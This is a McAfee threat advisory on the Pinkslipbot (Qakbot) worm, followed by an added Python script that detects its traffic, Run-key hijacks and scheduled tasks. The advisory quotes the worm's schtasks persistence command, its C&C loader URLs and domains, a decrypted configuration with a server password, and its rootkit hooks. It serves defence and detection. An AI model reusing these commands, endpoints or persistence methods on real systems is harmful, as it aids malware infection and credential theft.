McAfee Labs Threat Advisory W32/Pinkslipbot

McAfee Labs Threat Advisory
W32/Pinkslipbot
May 26, 2011

Summary

The W32/Pinkslipbot worm is capable of spreading over network shares, downloading files, and updating its software. Additionally, it is capable of receiving backdoor commands from its IRC command and control center. It attempts to steal user information and upload it to FTP sites.

Aliases: Qakbot, Akbot, Qbot

Detailed information about the worm, its propagation, and mitigation are in the following sections:
o Infection and Propagation Vectors
o Prevalence Information
o Characteristics and Symptoms
o Rootkit Behavior
o Restart Mechanism
o NTFS Folder Permission Alteration
o Getting Help from the McAfee Foundstone Services team

Infection and Propagation Vectors

There are two infection and propagation vectors that Pinkslipbot primarily uses to spread itself. Below are the description and mitigation for each one.

Exploits

Many Pinkslipbot infections have been reported to propagate by exploiting web-related vulnerabilities. Known vulnerabilities used to propagate this threat include:
o Vulnerability in the Microsoft Data Access Components (MDAC) Function
   o http://support.microsoft.com/kb/870669
   o /MS06-014.mspx
o Apple QuickTime RTSP URL Handler Stack-based Buffer Overflow
   o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4673
   o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015
o Adobe getIcon Stack-based Buffer Overflow
   o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927
o MsVidCtl Overflow in Microsoft Video ActiveX Control
   o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0015
o Adobe Reader and Acrobat CoolType.dll Font Parsing Buffer Overflow Vulnerability
   o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883

Mitigation

It is recommended that all computer systems are updated with the latest vendor patches, not limited to the vulnerabilities mentioned above. In addition, restricting scripting and browser plugins for document files and media players can further mitigate the risk of malware bypassing certain browser security.

Network Shares

Pinkslipbot is known to spread over open shares such as C$ and ADMIN$. If an open network share is found, Pinkslipbot-related files are copied over to the share and executed remotely.

Mitigation
o Enforce a strict password policy on all network shares and allow write permissions only to trusted accounts that need it.
o Though this may not apply to all Pinkslipbot variants, it is recommended to turn off Autorun functionality (http://support.microsoft.com/kb/967715).

USB and Removable Drives

Pinkslipbot can also spread over removable drives. Once the machine is infected, it will monitor for an attached drive. If one is found, it will create a copy of itself with the same filename as any directory on the drive.

Mitigation:
o Disable the Autorun feature on Windows. You can do this remotely using Windows Group Policies.
o Restrict the use of USB drives on mission-critical and server machines.
o Implement and test Access Protection Rules using VirusScan Enterprise to prevent writing of AUTORUN.INF files.

Prevalence Information

The following graph captures the prevalence information seen in the field for W32/Pinkslipbot infections. This data is captured from the McAfee Virus Map. The graph shows the daily distribution of unique IP addresses reporting infections for this threat in May 2011:

A quick view of the distribution of these infections across countries shows that the W32/Pinkslipbot threat is primarily dominant in the US:

A Google Maps view (North America) of reported Pinkslipbot infections in May 2011 is presented below:

W32/Pinkslipbot is known to evolve continuously. McAfee has seen many unique variants of this malware in 2011. The following graph captures the week-wise distribution of unique variants seen to date in 2011:

Characteristics and Symptoms

Description

An executable is downloaded as a result of an initial infection. The EXE contains an encrypted DLL and a configuration file, which are dropped and used for initialization and injection. The DLL file is loaded into the EXE's process memory. It sets up hooks (see the Rootkit Behavior section) in multiple processes for data gathering and information stealing purposes. Pinkslipbot also injects its DLL code into some processes such as:
o msmsgs.exe

The injected code then attempts to reach out to the Internet to gather other configuration files and updates. In older variants, configuration information was available via a password-protected ZIP archive with the static password "Hello999W0rld777".

The EXE, DLL and other configuration files are typically stored under a randomly named subfolder within the following folder:
o %AllUsersProfile%\Application Data\Microsoft\

The configuration file is encrypted. On decryption it contains C&C and FTP server information. The following is an example of such a decrypted configuration file:

cc_server_port=16768
cc_server_pass=Ijadsnanunx56512
p2p_node_lst=http://bckp01.in/cgi-bin/ls1.pl
ftphost_1=
ftphost_2=
ftphost_3=
ftphost_4=
ftphost_5=
update_conf_ver=908

Once installed, a user-mode rootkit hides these files from GUI-based applications. A cmd.exe directory listing, however, would allow one to list the files.

Some of the filenames observed on an infected system:
o botinj.exe
o q2l.exe
o q1.dll
o Start Menu\Programs\Startup\startup.bat
o si.txt
o File names containing "_irc"
o nbl_*.txt
o removeme.txt
o alias_qa.zip
o *_*.kcb
o alias_qbotnti.exe
o alias_si.txt
o alias_qbot.cb
o resume.doc
o sconnect.js
o alias_seclog.txt
o updates.cb
o updates_*new.cb
o installed
o uninstall.tmp
o qbot.cb

o [random].job
o Mpr.dll

The malware has key logging, password stealing and certificate stealing abilities, and attempts to collect geographic, OS, IP, e-mail address, visited-URL and other system information. Such information is sent to compromised FTP hosts as shown below.

As seen above, the malware uploads the stolen information under the file names seclog*.kcb and ps_dump.Administrator_*.kcb, the latter containing the stolen password information.

Network connections may be made on the following network ports:
o 80
o 21
o 31666
o 16666-16669

Network connections are known to be made to the following domains:
o 2121cdsfdfd.com
o up02.co.in
o up03.in
o up003.com.ua
o .in
o laststat.co.in
o bckp01.in

In addition, it can also monitor traffic to URLs that contain the following strings:
o ca.com
o businessaccess.citibank.citigroup.com

o nsonline.com/corpach/

During our investigation of multiple variants of this threat, we observed the following variations in the HTTP POST requests and URLs sent to the C&C server:
o http://[domain-name]/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=bthes7664&it=3&b=18
o http://[domain-name]/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=jpwel2451&it=2&b=6
o http://[domain-name]/cgi-bin/jl/jloader.pl?u=u/updates_usoqc8673.cb
o http://[domain-name]/cgi-bin/jl/jloader.pl?u=u/updates.cb
o http://[domain-name]/cgi-bin/jl/jloader.pl?r=q/we.js?u=usoqc8673&v=piuv8
o http://[domain-name]/cgi-bin/jl/jloader.pl?r=q/qa.zip&uninstall=ppozu1276
o http://[domain-name]/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=zzekr1617&it=2&b=197
o http://[domain-name]/cgi-bin/jl/jloader.pl?loadfile=q/q2_force_exec_success
o http://[domain-name]/cgi-bin/jl/jloader.pl?loadfile=q/q2_irc_nick
o http://[domain-name]/cgi-bin/clientinfo3.pl?cookie=socks-1-1580-zevhd0018
o http://[domain-name]/cgi-bin/clientinfo3.pl?cookie=sysinfo-43-2716-fzrmj8460

Note: domain-name varies based on the active C&C server.

Pinkslipbot attempts to steal the following information from infected hosts:
o POP3, IMAP, NNTP, Email, SMTP passwords
o Keystrokes
o Digital certificates
o HTTP session information

Some newer samples were observed to have valid stolen digital signatures.

Mitigation
o Where possible, configure the perimeter and/or desktop firewall to restrict connections to the reported network ports, URLs and domain names.
o Users who are known to have been infected should change their passwords.
o Always ensure you have the latest DATs installed for the McAfee VirusScan product. The latest DAT at the time this document was updated is DAT 6354.
o For customers with the McAfee Network Security Platform (NSP) product, we recommend enabling the following attack signatures:
   o To detect the vulnerabilities being exploited by W32/Pinkslipbot:
      0x40231a00 - HTTP: Apple QuickTime RTSP URL Buffer Overflow
      0x4021dd00 - HTTP: Microsoft Internet Explorer ADODB.Stream Object File Installation
   o To detect W32/Pinkslipbot-infected victims on the network:
      0x48804e00 - BOT: Quakbot (PinkSlip) Traffic Detected

Rootkit Behavior

Some variants of this malware have also been known to install a rootkit component to hide its presence, including its running process and registry entries. In such cases, the malware will be hidden from normal process viewers and registry editors such as Task Manager and regedit.exe. The following are system APIs that are hooked to accomplish this:
o ws2_32.dll!connect
o ws2_32.dll!send
o ws2_32.dll!WSASend
o wininet.dll!HttpOpenRequestW
o dnsapi.dll!DnsQuery_A
o dnsapi.dll!DnsQuery_W

At the time of research, some existing executables that it avoids hooking are:
o msdev.exe
o dbgview.exe
o mirc.exe
o ollydbg.exe
o ctfmon.exe

Pinkslipbot prevents user DNS queries from resolving when connecting to sites whose names contain the following strings:
o windowsupd

o otkit
o securecomputing
o sophos
o spamhaus

Restart Mechanism

Description

Pinkslipbot executables accept the following parameters:
/i – Drops a DLL and a configuration file
/s – If passed with the configuration file, runs Pinkslipbot in service mode
/t – Terminate
/c – If passed with an executable name, runs that executable

As a restart mechanism, Pinkslipbot will attempt to modify an existing "Run" registry key to include its own EXE and DLL. The original executable pointed to by the "Run" key is included in its "Run" path and launched with the "/c" switch.

As an example, it will modify an existing Run key such as:
HKEY_LOCAL_MACHINE\...\Run
   [Original] = [Path to Original]
to:
HKEY_LOCAL_MACHINE\...\Run
   [Original] = [random].exe [random].dll /c [Path to Original]
In newer variants, the Run key may be modified to:
HKEY_LOCAL_MACHINE\...\Run
   [Original] = [random].exe /s [Pinkslipbot config file]

Pinkslipbot uses a second restart mechanism. It saves a JavaScript (JS) file in the Windows System32 folder. The name of this file is typically sconnect.js; newer variants use randomly named JS files. A Windows Task Scheduler job is then created which launches this JS script. This job is scheduled to run hourly. The JS file is also crafted to connect to malicious sites to download updates to the Pinkslipbot components. The following is the task setup:
o "%windir%\system32\schtasks.exe" /create /tn [TaskName] /tr "%windir%\system32\cscript.exe //E:javascript [JavaScript File]" /sc HOURLY /mo 4 /ru

Mitigation
o Create and test a VirusScan Access Protection Rule (APR) to prevent cscript.exe and wscript.exe processes from reading and executing files from the %UserProfile% folder, where feasible.
o Create and test a VirusScan Access Protection Rule (APR) for "updates_*new.cb", "upd_*.cb" and "updates*_new.cb". These are usually used as Pinkslipbot configuration files. Blocking these files can prevent the malware from updating.

NTFS Folder Permission Alteration

Around December 2010, new variants of Pinkslipbot were observed modifying NTFS permissions for folders where security products are installed. This modification is possible only when Pinkslipbot is allowed to infect while the user is logged in with Administrator privileges.

When successful, NTFS permissions for security-related folders are removed such that access is denied to administrators and system processes. Effectively, the Windows operating system will not allow security products to run without the appropriate permissions.

For example, the following McAfee folders are targeted:
o %AllUsersProfile%\Application Data\McAfee
o %ProgramFiles%\McAfee

Due to this change, files run from these locations will be denied permission by the Windows operating system. In some cases there have been reports that Pinkslipbot has been removing permissions from the %ProgramFiles% folder. In such cases many common user applications would be impacted.

Mitigation

Users should not be logged in with administrative privileges for daily use, except to perform specific administrator tasks. This helps prevent the malware from altering folder and system permissions.

Remediation
o A custom Stinger tool is provided by McAfee Labs upon request to restore modified NTFS permissions. You must run the Stinger tool with a user account that has Administrator privileges. It will restore the original NTFS permissions to allow McAfee programs to be loaded.
o As an alternative, manual instructions to restore the folder's permissions are as follows:
   1. Open Windows Explorer as Administrator and right-click the icon for the affected folder(s).
   2. Click "Properties" to access the folder properties.
   3. Under the "Security" tab, click "Advanced", then "Owner".
   4. Choose the Administrator as Owner (or some user with Administrator privilege).
   5. Click OK when prompted to apply changes.
   6. Return to the Security tab under "Properties" again.
   7. Click "Advanced", and select "Inherit from parent the permissions entries that apply to child objects".
   8. Click OK when prompted to apply changes.
o Reboot the infected machine to restart all critical services.

Getting Help from the McAfee Foundstone Services team

This document is intended to provide a summary of current intelligence and best practices to ensure the highest level of protection from your McAfee security solution. The McAfee Foundstone Services team offers a full range of strategic and technical consulting services that can further help to ensure you identify security risk and build effective solutions to remediate security vulnerabilities.

You can reach them here: ontact.aspx

© 2011 McAfee, Inc. All rights reserved.
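The network indicators listed under Characteristics and Symptoms (the jloader.pl and clientinfo3.pl request patterns and the C&C domains) and the two persistence methods described under Restart Mechanism (the rewritten "Run" value and the hourly cscript.exe task) can be checked mechanically. The Python script below is an added example for this page, not McAfee's code or part of the advisory. It runs three heuristic checks over constructed sample data standing in for a simplified proxy log, the output of `reg query` against the Run key, and the output of `schtasks /query /fo CSV /v`. The domain cnc-example.test, the client addresses, the value names, file paths and task names in the samples are constructed; the URL paths, parameter names, domains and command-line shapes are the ones the advisory reports.

```python
r"""Indicator checks derived from the W32/Pinkslipbot advisory (added example, not McAfee code).

Runs offline over constructed sample data that stands in for:
  - a simplified proxy log, one request per line: "<timestamp> <client-ip> <method> <url>"
  - the output of:  reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - the output of:  schtasks /query /fo CSV /v   (columns trimmed to the ones used here)
"""
import csv
import io
import re
from urllib.parse import parse_qs, urlsplit

# --- patterns taken from the advisory --------------------------------------
KNOWN_DOMAINS = {"up02.co.in", "up03.in", "up003.com.ua", "laststat.co.in", "bckp01.in"}
CNC_PATHS = {"/cgi-bin/jl/jloader.pl", "/cgi-bin/clientinfo3.pl"}
CNC_PARAMS = {"r", "u", "n", "it", "b", "loadfile", "uninstall", "cookie"}
# Run value rewritten to "[random].exe [random].dll /c [Path to Original]" ...
HIJACK_C = re.compile(r"\S+\.exe\s+\S+\.dll\s+/c\s+\S", re.I)
# ... or, in newer variants, to "[random].exe /s [Pinkslipbot config file]".
HIJACK_S = re.compile(r"\S+\.exe\s+/s\s+\S+", re.I)
# One value line of `reg query` output: "    <name>    REG_SZ    <data>".
RUN_LINE = re.compile(r"^\s*(?P<name>\S.*?)\s+REG_(?:EXPAND_)?SZ\s+(?P<data>.+?)\s*$")
# Scheduled-task action of the form "cscript.exe //E:javascript <file>.js".
SCRIPT_HOST = re.compile(r"\b[cw]script\.exe\b", re.I)
JS_PAYLOAD = re.compile(r"//E:javascript|\.js\b", re.I)


def find_cnc_requests(log_lines):
    """Return (client, url, reason) for requests matching the advisory's C&C traffic."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        u = urlsplit(url)
        if (u.hostname or "") in KNOWN_DOMAINS:
            hits.append((client, url, "known domain"))
        elif u.path in CNC_PATHS and set(parse_qs(u.query, keep_blank_values=True)) & CNC_PARAMS:
            hits.append((client, url, "jloader/clientinfo pattern"))
    return hits


def find_hijacked_run_entries(reg_query_output):
    """Return (value name, data, reason) for Run values shaped like the Pinkslipbot rewrite."""
    hits = []
    for line in reg_query_output.splitlines():
        m = RUN_LINE.match(line)
        if not m:
            continue
        data = m.group("data")
        if HIJACK_C.search(data):
            hits.append((m.group("name"), data, "/c wrapper around original program"))
        elif HIJACK_S.search(data):  # heuristic: legitimate "/s" switches exist too
            hits.append((m.group("name"), data, "/s service mode with config file"))
    return hits


def find_suspicious_tasks(schtasks_csv):
    """Return (task name, action, schedule type) for tasks running a JS file via a script host."""
    hits = []
    for row in csv.DictReader(io.StringIO(schtasks_csv.strip())):
        action = row.get("Task To Run", "")
        if SCRIPT_HOST.search(action) and JS_PAYLOAD.search(action):
            hits.append((row.get("TaskName", ""), action, row.get("Schedule Type", "")))
    return hits


# --- constructed sample data (cnc-example.test, hosts, names and paths are made up) --
SAMPLE_PROXY_LOG = [
    "2011-05-20T10:01:02 10.0.0.21 GET http://www.example.com/index.html",
    "2011-05-20T10:01:09 10.0.0.21 POST http://bckp01.in/cgi-bin/ls1.pl",
    "2011-05-20T10:02:17 10.0.0.34 POST http://cnc-example.test/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=bthes7664&it=3&b=18",
    "2011-05-20T10:03:40 10.0.0.34 POST http://cnc-example.test/cgi-bin/clientinfo3.pl?cookie=socks-1-1580-zevhd0018",
    "2011-05-20T10:04:00 10.0.0.50 GET http://intranet.example.com/cgi-bin/jl/jloader.pl",  # same path, no C&C parameters
]
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SunJavaUpdateSched    REG_SZ    "C:\Program Files\Java\jre6\bin\jusched.exe"
    Adobe ARM    REG_SZ    C:\ProgramData\Microsoft\xkzqa\ntqwb.exe C:\ProgramData\Microsoft\xkzqa\mpr.dll /c "C:\Program Files\Adobe\Reader\AdobeARM.exe"
    IntelliPoint    REG_SZ    C:\ProgramData\Microsoft\rmvex\fjqua.exe /s C:\ProgramData\Microsoft\rmvex\fjqua.cb
"""
SAMPLE_SCHTASKS = r"""
"HostName","TaskName","Task To Run","Schedule Type"
"WKSTN01","\Adobe Flash Player Updater","C:\Windows\system32\FlashPlayerUpdateService.exe","Hourly"
"WKSTN01","\At1","C:\Windows\system32\cscript.exe //E:javascript C:\Windows\system32\sconnect.js","Hourly"
"""

if __name__ == "__main__":
    for hit in find_cnc_requests(SAMPLE_PROXY_LOG):
        print("C&C traffic :", *hit)
    for hit in find_hijacked_run_entries(SAMPLE_REG_QUERY):
        print("Run key     :", *hit)
    for hit in find_suspicious_tasks(SAMPLE_SCHTASKS):
        print("Sched. task :", *hit)
```

On the sample data the script flags the bckp01.in request by domain, the two cnc-example.test requests by path and parameter shape, the two rewritten Run values, and the cscript.exe task, while leaving the ordinary Java, Flash and intranet entries alone. The "/s" check is the weakest of the three and is kept separate so an analyst can weigh it differently; on a live host, feed the functions the real `reg query` and `schtasks` output instead of the constructed strings.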
